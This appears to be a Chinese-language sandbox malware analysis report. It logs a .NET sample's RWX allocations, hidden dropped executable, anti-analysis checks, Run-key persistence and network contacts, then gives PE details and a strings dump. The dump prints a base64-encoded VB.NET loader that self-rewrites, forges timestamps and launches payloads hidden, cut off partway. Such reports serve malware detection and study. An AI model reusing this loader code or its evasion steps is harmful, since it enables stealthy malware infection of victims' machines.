allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545297.515125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x01160000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545297.515125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00536000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545301.562125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0052a000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545301.609125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00528000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545301.687125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x01161000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545301.765125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00513000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545301.765125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x01162000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545304.562125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x0053b000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545304.609125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x01163000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545305.140125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x00751000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545305.156125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x7ef20000
region_size: 327680
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
1727545305.156125
NtAllocateVirtualMemory
process_handle: 0xffffffff
base_address: 0x7ef20000
region_size: 4096
allocation_type: 4096 (MEM_COMMIT)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1988
success 0 0
在文件系统上创建可执行文件 (2 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
file C:\Users\Administrator\AppData\Local\Temp\t8owtf-2.0.vb
投放一个二进制文件并执行它 (1 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
将可执行文件投放到用户的 AppData 文件夹 (2 个事件)
file C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
file C:\Users\Administrator\AppData\Local\Temp\0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe
一个进程创建了一个隐藏窗口 (1 个事件)
Time & API Arguments Status Return Repeated
1727545295.250625
ShellExecuteExW
filepath: C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
filepath_r: C:\Users\Administrator\AppData\Local\Temp\tmpBAD4.tmp.exe
parameters: C:\Users\Administrator\AppData\Local\Temp\0452655b38e162bba8903239dccd08ae362ccbca8309762a16908ec94534101e.exe
show_type: 0
success 1 0
检查适配器地址以检测虚拟网络接口 (10 个事件)
Time & API Arguments Status Return Repeated
1727545301.828125
GetAdaptersAddresses
family: 0
flags: 15
failed 111 0
1727545301.828125
GetAdaptersAddresses
family: 0
flags: 15
success 0 0
1727545301.859125
GetAdaptersAddresses
family: 0
flags: 640
failed 111 0
1727545301.859125
GetAdaptersAddresses
family: 0
flags: 640
success 0 0
1727545301.890125
GetAdaptersAddresses
family: 0
flags: 0
failed 111 0
1727545301.890125
GetAdaptersAddresses
family: 0
flags: 0
success 0 0
1727545304.515125
GetAdaptersAddresses
family: 0
flags: 1158
success 0 0
1727545304.547125
GetAdaptersAddresses
family: 0
flags: 1158
success 0 0
1727545304.609125
GetAdaptersAddresses
family: 0
flags: 46
failed 111 0
1727545304.609125
GetAdaptersAddresses
family: 0
flags: 46
success 0 0
该二进制文件可能包含加密或压缩数据,表明使用了打包工具 (2 个事件)
section {'name': '.text', 'virtual_address': '0x00002000', 'virtual_size': '0x00013174', 'size_of_data': '0x00013200', 'entropy': 7.485901794893086} entropy 7.485901794893086 description 发现高熵的节
entropy 0.9807692307692307 description 此PE文件的整体熵值较高
检查系统上可疑权限的本地唯一标识符 (2 个事件)
Time & API Arguments Status Return Repeated
1727545293.562625
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
1727545301.562125
LookupPrivilegeValueW
system_name:
privilege_name: SeDebugPrivilege
success 1 0
终止另一个进程 (1 个事件)
Time & API Arguments Status Return Repeated
1727545295.250625
NtTerminateProcess
process_handle: 0x000002fc
status_code: 0xffffffff
process_identifier: 3012
failed 0 0
网络通信
与未执行 DNS 查询的主机进行通信 (1 个事件)
host 114.114.114.114
在 Windows 启动时自我安装以实现自动运行 (1 个事件)
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\System.XML reg_value "C:\Users\Administrator\AppData\Local\Temp\AppLaunch.exe"
执行一个或多个 WMI 查询 (2 个事件)
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM AntivirusProduct
连接到不再响应请求的 IP 地址(合法服务通常会保持运行) (1 个事件)
dead_host 44.221.84.105:80
可视化分析
二进制图像
数据导入图像 288x288
数据导入图像 224x224
数据导入图像 192x192
数据导入图像 160x160
数据导入图像 128x128
数据导入图像 96x96
数据导入图像 64x64
数据导入图像 32x32
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2020-07-09 14:00:28

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00013174 0x00013200 7.485901794893086
.rsrc 0x00016000 0x000002b0 0x00000400 2.2262387961457426
.reloc 0x00018000 0x0000000c 0x00000200 0.10191042566270775

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00016058 0x00000254 LANG_NEUTRAL SUBLANG_NEUTRAL None

Imports

Library mscoree.dll:
0x402000 _CorExeMain

L!This program cannot be run in DOS mode.
`.rsrc
@.reloc
?Xkl(N
?Xkl(N
&-;DNXl5
?Xkl(N
?Xkl(N
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
I%&/m{
iG#)*eVe]f
{{;N'?\fd
!?~|?"?
7]~]_?
M:[ltz
hD??k0_
V-|{E
~&\V7ohwt
%_L/]=
.7oR"{
?Oc1]<
6~_s~7m0"f
_W9PCi
[hq@k|2
iol&-Z
oF;QFMz~!}
gxp~!1&>_
co~{{7~'4L
2>O~#~
S@?yEB
kH>N`6_a
mTpk}!$
M<!$m?
|9e?uw
21/~]_uLuyrGN?op|7
$n_}~z~
_1g6C[ 7
%Qk::^
8[*G;AG
puL?+B*I
9Tt1T8ok
v-~Bo!)I
'Vo%aw'
_g~|24V)?
u8> :5
_H^uv>
|o?o?_
3i>1i?-
z9WoFlq
[g75(oHc`F#Q
jqlhq^C
oh=xa_;
0TvB~x~7IJ
Wh~Q J-
~_?k`
_`?]~3}:`(
4ok:4F6S~
01_~+@m
7w~?_h_>o
ocoEc~?
JI7A3~'~
2Ck"3hm$h
cOg1I?
~)u#Dxx6D(
<Q;Hb+
KO:Dyk~
[C+ i.o j7
0YSz0w4
swk7w/-$U
>HT#z%`_k@F
?=:N`B~
ck|D}yF
>-w~-5~GTLo$
?wH~_[A{H~
)}Bl$
E_e~Vd
^}/O_z
~__'?G
1]vi6N'N
?37w}
-_4]}/]
?~?~o!?
_4o3l
05ls^a:F&
4s5&;NT~
H${o)
5_cU<Q
z2km9N
.}CXa\
o%~__r
m";WbMf
m~#!o)
sd5Fm
oPp ?70d
[6oy@Z
bBq{2i
)A[*Vo[5
T>3~o;_&Nb[
~}O~3T8?ym
8G?&o}9X#!"_-
o6>;O/9u~1
~K?CV?
wD_s
#nt.~)z
_9}Bo'
3tk?-u
?0hE_5RK1
x~YC~$BE
+w*Nw
5~o/(?~
K>3x~n8om$'3
{o0?o0
o_o_~}mno
~5^im}
~?2/oo?|'
/wOowk
?n-o-w4
k}?=vZ_W[K[%
m[K?Z_
G_+?o/
[!_Oo|Kv
!_|57K
-v]~'|;.
?~{|k-`&
>ooC~!7o
;W#_C~
;W!7oC~
bo.@P
eSvhcvh
@wodvhooC
C./o\_
o7e*n!
oop|y
_8~>5~m3_5~?
FoKc/+
Z5_k_~_w~W
$|N/kp
5yGk?[%}
^_ho7n
D_m+<W? vM~
~MTK~_vS%okPw
%'ndU
5]vot;`
:s^8%$
j#b0Uo
OF}A_@3^
ek6-p~_#
' &oh7-
;n8mn_n>C
A~wl$F!mHf[
[&oD~#
>oco,uZ
O~o6/
Iqoo9l
_C^mX6
ozC'c)
~~KFwI
Wo_T3a
z?Vxu
5/~_~w3{~_g.?td_O
SBz7~M7&M
7OL_9u?~u~o6;~]
~="Gvm~?~
w70JCFj
'oHoF
_TAvoBo
g&*~O~[l>}
^>77y\vo
~=_>/}
^(__ApWfJ~
(8%on
oz__~7-
F7O ?._.mywQ
~cwHwc&o~~
*~0CzF7NgI}".iV`Grk
6y&k~#5m
_f`yd`~
/&s6oo6^
ofWFfi~ko~f
o~odg7
mbfMu~
D?_"__
E'[h?5yc
~?[?G?
[%Z[N4
!o~k)e~73?
~}$.rJ
%~hw_~uJ!
-<j<~O7~
Z #oaoB
:iC(gw4
>Xs?@R~kcfw$^K3hB]
_o$lm`.Zs
m_#O54
+'XgZ"^1
'_C<9%k
!tFo[:
_)Ji^','q
kU5>yA,Vf<
k<#,b,
u+W^^mpo
>mko->
v%]~'^x
mh1m<22
4k~_?u
[Sook_zHc
E/o!}[Z
oG/x5uo
7[wD/E
oke_wX0l
[ZmF39=
aVm]o
FV/(]~
(PbO~_o
j^DPK2_Xu~_L~_
~MkwP~=
qB#7q0O~o
';(o~1u'/B~
6K9yd{
`wb~_s0}
|L$7_{>F6_
7L-{6xookI9
o4`2jh}wk)^O
oDD7M~
,_5~/;~k
_okAOJ<;;Z
~?7uy~_
Mh(15~-
L~-Lo
[oo}l<&
7V?Io_
e~)g~=
"O+KoU
S!gc&s.
)@>h~?-m
[7moH?Gz!3]*%
;S k}rJx .Y]Ky
y_??x;k<$O'_*
>q7s~~@IG
+,7`J*G7/zD8~
3koOoS@s{
2>v.#O
~c2mwp_k@;"|w
Vh~Y3/
}xde5vkg|BZD3no[o
%~go0L'Lw1}
k.1>m2
?wU2Z]
]~'n$w!
|7]>"-
-FfM7rwJo
o~k<}B
l?F?YI_%_
M~RDOGk
w-to~]
~9L~mY#
_WH'o3N,LJOL^
yuHT+p
%o%ro;z
5zmUu$4HozUC~
;v~Kj[]h
/5oFL~%
{j|Hl]
~ouO'
|rK?v/5_
_yG$I~k
_k`N|}'_
_u~"O c~
lb0o:D|_-
&h!k%oLo+
"_G"_F~
'JzviG`
D)\c`R
:o GJ0
O&7_sW|
5y6#_X
__3)k8GAq4
ZD)QI{OQ'~_f`g
M~C7ek
X1_zQ~/^
`",:zm``
#2Bc|gw?}O
p<zl[,5
r@)<u_B7u~~g'B>
kJ:+Y2-QzL
3k7u!y
-~]~:.
O7~_[W~O[%-5EgI
tOd;G`=
a1Xoc`X5Zc)]
.n"gXCF~)~W
%?Ix]^#x/4$P/
"_M>M?-4v
0~)~e9T|
?\j_D`[
=~w=e~_5~BX
kN-L_eO7
K7YD~^
^[e[@_H
Z5~?@]\
#36A/=y'
u~}Ojc
05___
_cN~?~_
/]~_W.&[xa
_K~w}A+:
3okz_m
W?~W>B
g~G##?M~-~_
x/o_$~>
~ol5?vk
Iok?%I~
';C.>e|k
m~?okY/5
M85Pc_+?^g
kBh'%o
_s?c_/
}|1{?;
c?c3/
cC~3P/
??#?o1=
=~{|~=_75
_o-?#w
57|;[d~
%z_OAk$
aeJ~-w
~_w2&Kk}
e6Y_7]
m~?m#_
_&-Bk_
dJ?v ..zP
7okMqv
/5*&wO~k_IkJ
?_~_H~_w5?
YPoo?'
k5~Lm~<5
<507U/~5
QoKo7_
wG7/~:5Voku
?~_ork=5
qO_OIM~_
?ky2m~o_
.~zkZ_?
{oskcoY?_
}~7;5kk
M_f__7C
oZ_kec
3~?oOZ
okm~VW
6?k___
o~k~_k
/_S.~o~
J:_5~Bz
{P_kk[
{og:uoW:.{
w{uv_S_
?07/h7o
/?65~kw>9_z?zMMo7
]__k?c]=8c
r_Amr
_/_E#W8musw
dokgyH-_!RJ
@+/5_?
~_WW[cRGc'$<
_'6G;?
F~rjGO@?
1__oWZcw
'~B?Yn/.
~_k9/Z_1~H-5_Kf
?kgHOZ
x_g>G~_
O+ok;@l~}~8}~
~oOA[K~?u
IGs-_
vk/dks?
~rH|}o%
{vcF/~_/
M~u7|kW#/
o~a9/3
?r3AF~{T
_H/~?/_F
1{t_u~oI
?.`%wAog
7~H:Wo_~M_I~
v_wok_
oc>o~_w
~?wwugu
ogZk{
K7{1|~
fl"?O_/'=_k?~__
_fw~
?<_~H~?????$
kZfkyok
16_kDcF
co@5~_7
"/!9_?OS>
a{[_M2O_?_~
75_7.O~
0Ou_u_
??co/cn
o&o;}7G
ozQ_F{ooN'c
Yof?A_#v/fofo)J5~_;k;[
_?H75#
i_>O_ G
>o<M^&'kW
?Z_7-~-J%
_kgk!sk_k
5kk<5_
g-~_k_/5A
o}K~~k
C%'?N
[O(!=o
fZe15(uT'fO
_\Ve1
Z_jZyM
yV/evAi0
.7<kT~
_U^gj?oOu
h~Y=+2j=
mNyq$:b
"{k<}z9
}ky}zr_/
7vlSybIs
YUM5P$0
I5/_qs
z3Oj\b(2{c
[Vw :_451K~k45o
zk|WO</zv
:)Tb<+I.
Qq_cb
syg|..~`yt9?ksQ,rf3B
3$&Df~?9~|1
?NO_+z
S^O^w8}z&''
/_w#:~c_
?i~}}S
6IG^d/O=g01Q^
Z'WY*Kc
@Ok<-x-
4+:[6bEm4w:XE5V
NC[1YU
vh~ov>
rsx^]V+4
kaI%a@i^
55t8'qhtR&^
:?7V\h
5b~5Lf?Y_
.X8s_\z]
UqvQ=!
|_W;O=?WO
%;}kLm7o
zk} \ZEu_k
dtZAs{'x
oZA-C_%XeE
Hf@i_aAv
/{D~8~kB*t\
0"hEnX
^FG6.
+E m]]K_c]
l%Q,25_B=
/)_J>c
TR&1!Bc{Z
1S+%t:
:vDn)
%LV9Z$
Ou~E?jy-?~
kbO{:G
4/(/|?h>
Mh&EgO^
Xv>+pf
e^fu~6)I
P|s^,5
G/^g&x6s
S}5V$d%9dV5V
d0y+`B&;;K]hm%we+
&w|;EUV~*l
}z=]}44u~
'F*\,X
75shP@
@I&k>D
v"^-`d7
b?0<X-
QM~Z~aF~
M/^ 'D9
7g/}7g_5~WO
/O_{yzR\
m'|y9T'
$~mZyk
dEtw)R
)5{WO.NY._
ZIE*sZu+=dd
Pn@}[J
nRLPevu
%-WG,2|4
}D$Q_eWF
^~cx~~
IF)OLHz~9}qL/|I"
}kha],
aUk-fJ2
0%:F up\&
ycd!#:$OJX
N5l]~>m*
15"x;c
9cYYO_}S*q</*_
cPf&/[
/ 2C/wq "
$B~C/7
}C%)BJ>En
5~dhX&t^W;\3vAcdiH
LzZQ07
pG%kp78
GXW9dO
}t^4 =FN~F>c
QV8_a
95$;#[/!^;
PYHfuC/g/H89eJ [9I}$a'\j
2[ffIP?
*0f%^!L"NF.D
Z~"F^M
kaon&N
/;\B.dH
W0BF/ne
\I+~LD
%yNVG}KJFK
y&z,jD
!*R *
|_LzSg
~oBqyA/~
X!aEa:Qd}]h
sYaU=BbkF
9^E'O'
fG<~}rv
K-1I/D
w[)Z!-=11/
(OiVm?'4-
&M@_~E~k|E
ej"z_
3Hvs014
%q>[J5)
?Q{]bo$5O)/
J|Yfo*;
&_/k\54\fF
.ivd<^M_I< o
Y#:1$ZjqVI<bLfAI2
F</_?[}/
9bku1O
(+O"qN_8}N/>t6V
$TK Co
^_=%E0s}I
/$py2{
qkd35fk
1~+6#X{
_~qN]N+
p|I}I#zk<~NcxC?_qB
1_7}J?_
Q{m>
?95~5~o7?IOi-x7~Cm)0
}]0:57~
f> ;W4L#o
KO~g4Oi
)}i;f5~|
(A_7~A"
-_og_If
s[x~R?%}C
WB_%A5~cs?79|
{3)IpR9A;#h
|V9;&n>^2%!Qo
>g[:ZwI~
ux<CvN@_
.~_wuJ
wIO'[o
9t6?~4X_h96!F
_?ck>O
X=g?o?~R/
i~_#5GO~
~5~m2VvF?')t
5FO[Od'
k5$W'k!
w4"_7=!o4m
V u1KqL
eAP0!Nt
~[hYHIS
k|zo_g0
="Oonn'ou|3
olKIV>Me
_])3M%q;w5~r9Psb`k
toN"9s?x
a|Na^9~/
tX3^%#s7{
."k|z
H7.mKV8
svJQ(Oh
P]qcj2
CGc;gQ+q
P<>}}jTD
e>!?x1`d
2--nrp
k<|JekJIB^3O]>ZG7o
Y6<fKw9O~{
KbxU}XG|O
EFZA4 [[d&
R>&52io
Fse~8<;]
>~}p7oh3~7[>qC
L+}MC>1W@
P{x{fL?
vz`F*~
~RT%80
DN&]-^X_wD
a^>yZg
Pv6K@p
G>lG4@!+3O
qIYY<)t*
?rtxKp
<$KeB
E}kVx{0
_-d&6GR]
o[(>&p.
w'XOS<%(&#ikx4er>%%
YCx!'q]
c()I\A
k23AJ0K_
}MkD?~
?qg?c5~
~375~w-~
kZoB?~7I
|C51c)u'
7*7hQ%
ko@D'f
tCokzo
E~3z'~C
|x@~_`
/o[Ao[
%-~_/eF
A'D7[:}c(XjFkz?
~?_u~}c+oH
;(.ZUjRC
~5~/'bns2
_7?WfmQ-g'
2}F9u Ik
Ve3~]eo,ek>-N
;&!T"3!ToB
W_wM`#
BWM~'2d_
?/u~}s
;IoG?HKv
Tva~M66O
00o!&HL
%v~&_<
_A,5~_
IZoB
)/7:#k
}kZD_4
U9aF_Q@O4_N
y.O? _
~-~7$B'A;%
up@~6`
~C6">o
@8tml>iV
#MOb?uX
c7~'!A
E8WECx
foD+u&
yV<_?5`b
d)(C{W?
?$%8+
jynxUk
OSgI{~>}
;?zoFv
r?e$,5c5R
Or,a#-,T#
fNy&`1}H
&5ctk o+<f_._qhc9w;
nSW1wb3J0cyBTeXN0ZW0uSU8NCkltcG9ydHMgU3lzdGVtLklPLkNvbXByZXNzaW9uDQpJbXBvcnRzIFN5c3RlbQ0KSW1wb3J0cyBTeXN0ZW0uVGV4dA0KSW1wb3J0cyBTeXN0ZW0uRGlhZ25vc3RpY3MNCkltcG9ydHMgU3lzdGVtLkNvZGVEb20uQ29tcGlsZXINCkltcG9ydHMgU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcw0KSW1wb3J0cyBNaWNyb3NvZnQuVmlzdWFsQmFzaWMNCg0KUHVibGljIE1vZHVsZSBiQUZ3dm5PTEZqDQoNCidBUEkxDQoNCiAgICBQdWJsaWMgU3ViIE1haW4oQnlWYWwgYXJncygpIEFzIFN0cmluZykNCg0KICAgICAgICBJZiBOb3QgYXJncy5MZW5ndGggPiAwIFRoZW4NCiAgICAgICAgICAgIEF2TnhJQ1JYVUEuTGZEWVdEcmtHVygpDQogICAgICAgIEVsc2UNCiAgICAgICAgICAgIFRyeSA6IEZpbGUuRGVsZXRlKGFyZ3MoMCkpIDogQ2F0Y2ggOiBFbmQgVHJ5DQogICAgICAgIEVuZCBJZg0KDQogICAgICAgIERpbSByZXNtIEFzIE5ldyBTeXN0ZW0uUmVzb3VyY2VzLlJlc291cmNlTWFuYWdlcigiekNvbSIsIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkdldEV4ZWN1dGluZ0Fzc2VtYmx5KQ0KICAgICAgICBEaW0gRGF0YVggQXMgQnl0ZSgpID0gRGVmbGF0ZV9EKHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgIFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LkxvYWQoRGF0YVgpLkVudHJ5UG9pbnQuSW52b2tlKE5vdGhpbmcsIE5vdGhpbmcpDQoNCiAgICBFbmQgU3ViDQoNCiAgICBQdWJsaWMgRnVuY3Rpb24gRGVmbGF0ZV9EKEJ5VmFsIERhdGFaKCkgQXMgQnl0ZSkgQXMgQnl0ZSgpDQogICAgICAgIFRyeSA6IFJldHVybiBnZXRTdHJlYW1CeXRlc1goTmV3IERlZmxhdGVTdHJlYW0oTmV3IE1lbW9yeVN0cmVhbShEYXRhWiksIENvbXByZXNzaW9uTW9kZS5EZWNvbXByZXNzLCBUcnVlKSwgRGF0YVouTGVuZ3RoKQ0KICAgICAgICBDYXRjaCA6IFJldHVybiBOb3RoaW5nIDogRW5kIFRyeQ0KICAgIEVuZCBGdW5jdGlvbg0KDQogICAgUHVibGljIEZ1bmN0aW9uIGdldFN0cmVhbUJ5dGVzWChCeVZhbCBkYXRhU3RyIEFzIFN0cmVhbSwgQnlWYWwgZGF0YUNodW5rcyBBcyBJbnRlZ2VyKSBBcyBCeXRlKCkNCiAgICAgICAgRGltIGRhdGEoKSBBcyBCeXRlIDogRGltIHRvdGFsQnl0ZXNSZWFkIEFzIEludDMyID0gMA0KICAgICAgICBUcnkgOiBXaGlsZSBUcnVlDQogICAgICAgICAgICAgICAgUmVEaW0gUHJlc2VydmUgZGF0YSh0b3RhbEJ5dGVzUmVhZCArIGRhdGFDaHVua3MpDQogICAgICAgICAgICAgICAgRGltIGJ5dGVzUmVhZCBBcyBJbnQzMiA9IGRhdGFTdHIuUmVhZChkYXRhLCB0b3RhbEJ5dGVzUmVhZCwgZGF0YUNodW5rcykNCiAgICAgICAgICAgICAgICBJZiBieXRlc1JlYWQgPSAwIFRoZW4gRXhpdCBXaGlsZQ0KICAgICAgICAgICAgICAgIHRvdGFsQnl0ZXNSZWFkICs9IGJ5dGVzUmVhZA0KICAgICAgICAgICAgRW5kIFdoaWxlDQogICAgICAgICAgICBSZURpbSBQcmVzZXJ2ZSBkYXRhKHRvdGFsQnl0ZXNSZWFkIC0gMSkNCiAgICAgICAgICAgIFJldHVybiBkYXRhDQogICAgICAgIENhdGNoIDogUmV0dXJuIE5vdGhpbmcgOiBFbmQgVHJ5DQogICAgRW5kIEZ1bmN0aW9uDQoNCidBUEkyDQoNCkVuZCBNb2R1bGUNCg0KDQpQdWJsaWMgTW9kdWxlIEF2TnhJQ1JYVUENCg0KICAgIFB1YmxpYyBTdWIgTGZEWVdEcmtHVygpDQogICAgICAgIERlbE1lKCkNCiAgICAgICAgRGltIE15UGF0aCBBcyBTdHJpbmcgPSBQcm9jZXNzLkdldEN1cnJlbnRQcm9jZXNzLk1haW5Nb2R1bGUuRmlsZU5hbWUNCg0KICAgICAgICBEaW0gcmVzbSBBcyBOZXcgU3lzdGVtLlJlc291cmNlcy5SZXNvdXJjZU1hbmFnZXIoInpDb20iLCBTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseS5HZXRFeGVjdXRpbmdBc3NlbWJseSkNCiAgICAgICAgRGltIHNyYyBBcyBTdHJpbmcgPSBGcm9tQmFzZShyZXNtLkdldE9iamVjdCgic3JjIikpDQogICAgICAgIERpbSB6Q29tIEFzIEJ5dGUoKSA9IERlZmxhdGVfRChyZXNtLkdldE9iamVjdCgiZmlsZSIpKQ0KICAgICAgICBVc2luZyB3cml0ZXIgQXMgTmV3IFJlc291cmNlcy5SZXNvdXJjZVdyaXRlcigiekNvbS5yZXNvdXJjZXMiKQ0KICAgICAgICAgICAgd3JpdGVyLkFkZFJlc291cmNlKCJzcmMiLCBUb0Jhc2Uoc3JjKSkNCiAgICAgICAgICAgIHdyaXRlci5BZGRSZXNvdXJjZSgiZmlsZSIsIHJlc20uR2V0T2JqZWN0KCJmaWxlIikpDQogICAgICAgICAgICB3cml0ZXIuR2VuZXJhdGUoKQ0KICAgICAgICAgICAgd3JpdGVyLkNsb3NlKCkNCiAgICAgICAgRW5kIFVzaW5nDQoNCiAgICAgICAgRGltIHRlbXBuYW1lIEFzIFN0cmluZyA9IFN5c3RlbS5JTy5QYXRoLkdldFRlbXBGaWxlTmFtZSAmICIuZXhlIg0KDQogICAgICAgICAgICAgICAgRGltIFZhcnMgQXMgU3RyaW5nKCkgPSB7IkF2TnhJQ1JYVUEiLCAiYU5DSGl0RUJjRSIsICJiQUZ3dm5PTEZqIiwgIlVObERVY3dhYXAiLCAiZ01MTVRLSnVwZCIsICJ0UkxTeHJ5bWVpIiwgInhZcWZ3RmdTQXMiLCAiWmFWcVdxc3liYyIsICJMZkRZV0Rya0dXIn0NCiAgICAgICAgRm9yIGkgQXMgSW50ZWdlciA9IDAgVG8gVmFycy5MZW5ndGggLSAxDQogICAgICAgICAgICBzcmMgPSBzcmMuUmVwbGFjZShWYXJzKGkpLCBBKDE1KSkNCiAgICAgICAgTmV4dA0KCQlEaW0gUiBhcyBOZXcgUmFuZG9tDQoJCURpbSBYIEFzIEludGVnZXIgPSBSLk5leHQoMSwgIzEwMCMpDQoJCURpbSBqIEFzIE5ldyBVTmxEVWN3YWFwKDEsIFgpIDogUmFuZG9taXplKCkNCiAgICAgICAgU3JjID0gU3JjLlJlcGxhY2UoU3RyUmV2ZXJzZSgiMUlQQSciKSwgai5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajEgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIySVBBJyIpLCBqMS5nTUxNVEtKdXBkKQ0KICAgICAgICBEaW0gajIgQXMgTmV3IFVObERVY3dhYXAoMSwgWCkgOiBSYW5kb21pemUoKQ0KICAgICAgICBTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIzSVBBJyIpLCBqMi5nTUxNVEtKdXBkKSA6IFJhbmRvbWl6ZSgpDQoJCQ0KCQlTcmMgPSBTcmMuUmVwbGFjZShTdHJSZXZlcnNlKCIjMDAxIyIpLCBYKQ0KDQogICAgICAgIGFOQ0hpdEVCY0UuWmFWcVdxc3liYyh0ZW1wbmFtZSwgc3JjLCBUcnVlKQ0KDQogICAgICAgIERlbE1lKCkNCg0KICAgICAgICBEaW0gRGF0dW0gQXMgTmV3IERhdGUoMjAwMCArIHIuTmV4dCg3LCAxMSksIHIuTmV4dCgxLCAxMCksIHIuTmV4dCgxLCAzMCkpDQogICAgICAgIEZpbGUuU2V0Q3JlYXRpb25UaW1lKHRlbXBuYW1lLCBEYXR1bSkNCiAgICAgICAgRmlsZS5TZXRMYXN0QWNjZXNzVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQogICAgICAgIEZpbGUuU2V0TGFzdFdyaXRlVGltZSh0ZW1wbmFtZSwgRGF0dW0pDQoNCiAgICAgICAgRGltIHN0YXJ0SW5mbyBBcyBOZXcgUHJvY2Vzc1N0YXJ0SW5mbw0KICAgICAgICBzdGFydEluZm8uV2luZG93U3R5bGUgPSBQcm9jZXNzV2luZG93U3R5bGUuSGlkZGVuDQogICAgICAgIHN0YXJ0SW5mby5GaWxlTmFtZSA9IHRlbXBuYW1lDQogICAgICAgIHN0YXJ0SW5mby5Bcmd1bWVudHMgPSBNeVBhdGgNCiAgICAgICAgUHJvY2Vzcy5TdGFydChzdGFydEluZm8pDQogICAgICAgIFByb2Nlc3MuR2V0Q3VycmVudFByb2Nlc3MuS2lsbCgpDQoNCg0KICAgIEVuZCBTdWINCg0KCSdBUEkzDQoNCg0KICAgIFB1YmxpYyBGdW5jdGlvbiBBKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFuZG9taXplKCkgOiBEaW0gYigpIEFzIENoYXIgOiBEaW0gcyBBcyBOZXcgU3lzdGVtLlRleHQuU3RyaW5nQnVpbGRlcigiIikgOiBiID0gInF3ZXJ0eXVpb3Bhc2RmZ2hqa2x6eGN2Ym5tUVdFUlRZVUlPUEFTREZHSEpLTFpYQ1ZCTk0iLlRvQ2hhckFycmF5KCkgOiBGb3IgaSBBcyBJbnRlZ2VyID0gMSBUbyBsZW5naHQgOiBSYW5kb21pemUoKSA6IERpbSB6IEFzIEludGVnZXIgPSBJbnQoKChiLkxlbmd0aCAtIDIpIC0gMCArIDEpICogUm5kKCkpICsgMSA6IHMuQXBwZW5kKGIoeikpIDogTmV4dCA6IFJldHVybiBzLlRvU3RyaW5nDQogICAgRW5kIEZ1bmN0aW9uDQogICAgUHVibGljIEZ1bmN0aW9uIEFCKEJ5VmFsIGxlbmdodCBBcyBJbnRlZ2VyKSBBcyBTdHJpbmcNCiAgICAgICAgUmFu